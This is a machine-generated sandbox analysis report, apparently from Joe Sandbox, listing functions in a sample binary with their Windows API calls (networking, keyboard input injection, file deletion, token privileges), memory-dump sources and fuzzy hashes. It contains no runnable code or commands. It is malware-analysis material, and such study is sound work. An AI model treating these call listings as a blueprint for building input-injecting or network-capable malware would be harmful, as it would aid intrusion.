                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: dd1d7f8e97272fb586e21a1eabb9274fe1f43dbfde9b251aba038fb7fc8ec066
                                                    • Instruction ID: a196c0c931440d442a2859822cab3b71ad9443e35f30a48e084e45475e3dd88f
                                                    • Opcode Fuzzy Hash: dd1d7f8e97272fb586e21a1eabb9274fe1f43dbfde9b251aba038fb7fc8ec066
                                                    • Instruction Fuzzy Hash: F951C074600302DADB64BF65C891A6AB3E7AF56310F28D81FF686DB291DB34DC818F14
                                                    Function 006C69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 006C69D1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C69E1
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006C6A45
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C6A51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                    • String ID:
                                                    • API String ID: 2214342067-0
                                                    • Opcode ID: 09645205fc35e2651b91e18ddb0fa974b7d5b3e963ca0acba44b408deabedd36
                                                    • Instruction ID: ffffcac6d37cc7c5764fbb7f815f9c814a8cd8d6fceabc1b0a7f5c6e3c840a92
                                                    • Opcode Fuzzy Hash: 09645205fc35e2651b91e18ddb0fa974b7d5b3e963ca0acba44b408deabedd36
                                                    • Instruction Fuzzy Hash: F041A134640200AFEB90AF64CC86F7A77E6DF44B10F04851CFE59AF2D2DAB09D048B69
                                                    Function 006C641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,006DF910), ref: 006C64A7
                                                    • _strlen.LIBCMT ref: 006C64D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID:
                                                    • API String ID: 4218353326-0
                                                    • Opcode ID: 4c8ea13d973ac400116e6ce0dad4a8f49ac81f6d67af88f8613217ceb30d4865
                                                    • Instruction ID: 914f2f3efdcf3e67adc4ceaae9cb8a817cbcea18fdfdab3a97259433c5b655cc
                                                    • Opcode Fuzzy Hash: 4c8ea13d973ac400116e6ce0dad4a8f49ac81f6d67af88f8613217ceb30d4865
                                                    • Instruction Fuzzy Hash: 04419371900104ABCB54EBA4DC95FBEB7ABEF04310F64815DF91A97292DB30ED05CB68
                                                    Function 006BB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006BB89E
                                                    • GetLastError.KERNEL32(?,00000000), ref: 006BB8C4
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006BB8E9
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006BB915
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 471059b4c9069970779f013c37b302e5911500f6c551422a6685a432cac1c26a
                                                    • Instruction ID: 6eb1f16eaf597592afea4681f68dc18173ec01c691911a8e58704dc6f94735f4
                                                    • Opcode Fuzzy Hash: 471059b4c9069970779f013c37b302e5911500f6c551422a6685a432cac1c26a
                                                    • Instruction Fuzzy Hash: 47412C35600910DFCB50EF25C484A9DBBE2EF4A310F198499EC4A9B362CB70FD45CBA5
                                                    Function 006B0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006B0B27
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 006B0B43
                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006B0BA9
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006B0BFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 4d4106853f30434e56ea54a4d34deec56dbeef61385ef6e930350d196ac1d84b
                                                    • Instruction ID: 4132a9aa4c51dad387650cc3e8648fb75a7ff999e1965869820b9c4b61f7bbcb
                                                    • Opcode Fuzzy Hash: 4d4106853f30434e56ea54a4d34deec56dbeef61385ef6e930350d196ac1d84b
                                                    • Instruction Fuzzy Hash: 773146B0D40208AEFB308B658C05BFBBFABAB55318F08425AE491522E1C3768DC19765
                                                    Function 006B0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 006B0C66
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 006B0C82
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 006B0CE1
                                                    • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 006B0D33
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: f64b0b32b9fa81461e725c004354c291a5f9cd0d96e590b4ad68612ceec275cc
                                                    • Instruction ID: 0e9acf1f4e13d98cf6631b0079dff78280ce68112ef6f8c1ebad8d023dd1ec40
                                                    • Opcode Fuzzy Hash: f64b0b32b9fa81461e725c004354c291a5f9cd0d96e590b4ad68612ceec275cc
                                                    • Instruction Fuzzy Hash: 293103B0980218AEFF308B658815BFFBFA7AF49320F08431AE485522D1D7359DC587A6
                                                    Function 006861C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006861FB
                                                    • __isleadbyte_l.LIBCMT ref: 00686229
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00686257
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0068628D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 26a5407707d9bf93d3315fdaad10cbcfcfecc294af6e823cb33556f86a714e46
                                                    • Instruction ID: 60979e2d74236eb76920e964207e41db35a930eba499ddaf2e61f2ba35f7de60
                                                    • Opcode Fuzzy Hash: 26a5407707d9bf93d3315fdaad10cbcfcfecc294af6e823cb33556f86a714e46
                                                    • Instruction Fuzzy Hash: 1231D230600256EFDF21AF68CC48BAA7BBBFF41310F154269F86497291D731DA51D750
                                                    Function 006D4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 006D4F02
                                                      • Part of subcall function 006B3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006B365B
                                                      • Part of subcall function 006B3641: GetCurrentThreadId.KERNEL32 ref: 006B3662
                                                      • Part of subcall function 006B3641: AttachThreadInput.USER32(00000000,?,006B5005), ref: 006B3669
                                                    • GetCaretPos.USER32(?), ref: 006D4F13
                                                    • ClientToScreen.USER32(00000000,?), ref: 006D4F4E
                                                    • GetForegroundWindow.USER32 ref: 006D4F54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 9b0afb92838e02be9f498704bb2ae7bfcc8e408dad1c1cc69ba0f798035cff48
                                                    • Instruction ID: 75fc0fc6b1f738208364f766f9f429f926d61f58d2bdc8b092e7406dd49271b9
                                                    • Opcode Fuzzy Hash: 9b0afb92838e02be9f498704bb2ae7bfcc8e408dad1c1cc69ba0f798035cff48
                                                    • Instruction Fuzzy Hash: 31311E71E00108AFDB40EFB5C8859EFB7FAEF98300F10446AE815E7251EA719E458BA4
                                                    Function 006A8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006A8121
                                                      • Part of subcall function 006A810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006A812B
                                                      • Part of subcall function 006A810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A813A
                                                      • Part of subcall function 006A810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8141
                                                      • Part of subcall function 006A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8157
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006A86A3
                                                    • _memcmp.LIBCMT ref: 006A86C6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006A86FC
                                                    • HeapFree.KERNEL32(00000000), ref: 006A8703
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                    • String ID:
                                                    • API String ID: 1592001646-0
                                                    • Opcode ID: 3c5456a5a6650bda7af8d11d9df33fe8b663f2a655eb5ea347ae2406a5625c24
                                                    • Instruction ID: 5b2578f6d6ea0bd9873488c84b2ec6fa857c5cbeb34f2f1a21705e19cf682d6a
                                                    • Opcode Fuzzy Hash: 3c5456a5a6650bda7af8d11d9df33fe8b663f2a655eb5ea347ae2406a5625c24
                                                    • Instruction Fuzzy Hash: C221AE31E01108EFEB00EFA4CA48BEEB7BAEF56304F148059E404AB240DB30AE05CF90
                                                    Function 0067098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __setmode.LIBCMT ref: 006709AE
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006B7896,?,?,00000000), ref: 00655A2C
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006B7896,?,?,00000000,?,?), ref: 00655A50
                                                    • _fprintf.LIBCMT ref: 006709E5
                                                    • OutputDebugStringW.KERNEL32(?), ref: 006A5DBB
                                                      • Part of subcall function 00674AAA: _flsall.LIBCMT ref: 00674AC3
                                                    • __setmode.LIBCMT ref: 00670A1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                    • String ID:
                                                    • API String ID: 521402451-0
                                                    • Opcode ID: f19407d504152f8e85659905e4fbe39eb57abd36c20a2dbf1cbacd6d8ce64612
                                                    • Instruction ID: 62330f142c7e0218eeb99cf129079f96fae21d8ab5a16b15914fb06a7cc9f3f4
                                                    • Opcode Fuzzy Hash: f19407d504152f8e85659905e4fbe39eb57abd36c20a2dbf1cbacd6d8ce64612
                                                    • Instruction Fuzzy Hash: 53115771904208AFDB44B7B49C8A8FE77AB9F42320F14801DF10957183EF20484687A9
                                                    Function 006C1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006C17A3
                                                      • Part of subcall function 006C182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006C184C
                                                      • Part of subcall function 006C182D: InternetCloseHandle.WININET(00000000), ref: 006C18E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 925d60ef2ca3373e1b41aa593ab9a259d8a28e7a3891859569933bc75be233db
                                                    • Instruction ID: 9dbbff99355c30ccea4bc0b4e968f34246f4c44063a9b843b0d2df086146f05e
                                                    • Opcode Fuzzy Hash: 925d60ef2ca3373e1b41aa593ab9a259d8a28e7a3891859569933bc75be233db
                                                    • Instruction Fuzzy Hash: C621D131605601BFEB129F60DC00FBABBEBFF4A710F14402EFA159A652DB71D811A7A0
                                                    Function 006B3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,006DFAC0), ref: 006B3A64
                                                    • GetLastError.KERNEL32 ref: 006B3A73
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 006B3A82
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,006DFAC0), ref: 006B3ADF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0
                                                    • Opcode ID: b5abc35f0a5adefb13f5789229542bb94c4996d242be628d587cf8d254042621
                                                    • Instruction ID: 21577e40a3fe64788938bfc72b0dade8d70d10eadfea4e21ca42b2a6561bac12
                                                    • Opcode Fuzzy Hash: b5abc35f0a5adefb13f5789229542bb94c4996d242be628d587cf8d254042621
                                                    • Instruction Fuzzy Hash: B52186B46092119F8310DF28D8858EA77E6AF55364F244A1EF4DAC73A1D731DE8ACB42
                                                    Function 006850E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00685101
                                                      • Part of subcall function 0067571C: __FF_MSGBANNER.LIBCMT ref: 00675733
                                                      • Part of subcall function 0067571C: __NMSG_WRITE.LIBCMT ref: 0067573A
                                                      • Part of subcall function 0067571C: RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,00670DD3,?), ref: 0067575F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 3e043f3fc71b2d4e68607e736fee343c6fb709ee37fc45a9c7ffb39b4de7ff37
                                                    • Instruction ID: 79c0e93cf8e4f5f5552149d1b52ef062b256e9c9d464bb8397293d25d8ae0810
                                                    • Opcode Fuzzy Hash: 3e043f3fc71b2d4e68607e736fee343c6fb709ee37fc45a9c7ffb39b4de7ff37
                                                    • Instruction Fuzzy Hash: 2511E372901A11AFCB313F74EC0D79D379B9F04361B11862EF98A9A290DF348D419798
                                                    Function 006544A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006544CF
                                                      • Part of subcall function 0065407C: _memset.LIBCMT ref: 006540FC
                                                      • Part of subcall function 0065407C: _wcscpy.LIBCMT ref: 00654150
                                                      • Part of subcall function 0065407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00654160
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00654524
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00654533
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0068D4B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    • Opcode ID: fb79ba396fcdecf7040cbbf66343f91e6187b86e0794253de84d0d6d555e4b6c
                                                    • Instruction ID: ab3b98f1bf8a75e53b2c097469c546d34165a8aeb77c448efb6de6af38a5d797
                                                    • Opcode Fuzzy Hash: fb79ba396fcdecf7040cbbf66343f91e6187b86e0794253de84d0d6d555e4b6c
                                                    • Instruction Fuzzy Hash: 23210770904784AFE7329B249855BE6BBEEAF01319F0440DEE68E56281D7742988CB51
                                                    Function 006C6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006B7896,?,?,00000000), ref: 00655A2C
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006B7896,?,?,00000000,?,?), ref: 00655A50
                                                    • gethostbyname.WSOCK32(?,?,?), ref: 006C6399
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C63A4
                                                    • _memmove.LIBCMT ref: 006C63D1
                                                    • inet_ntoa.WSOCK32(?), ref: 006C63DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    • Opcode ID: 126f50f200871e1180cc1554df103e85c41923a03a2e457fc15d9cd5b8d8e403
                                                    • Instruction ID: 8ae2bd9dcf04f6dc1c1435ee7d77184a4d6f0e9fef83a39eff9102ba83c44007
                                                    • Opcode Fuzzy Hash: 126f50f200871e1180cc1554df103e85c41923a03a2e457fc15d9cd5b8d8e403
                                                    • Instruction Fuzzy Hash: BE115E71900109AFCB44FBA4DD96DEEB7BAEF04311B14406DF906A7261DB30AE08DB65
                                                    Function 006A8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006A8B61
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006A8B73
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006A8B89
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006A8BA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
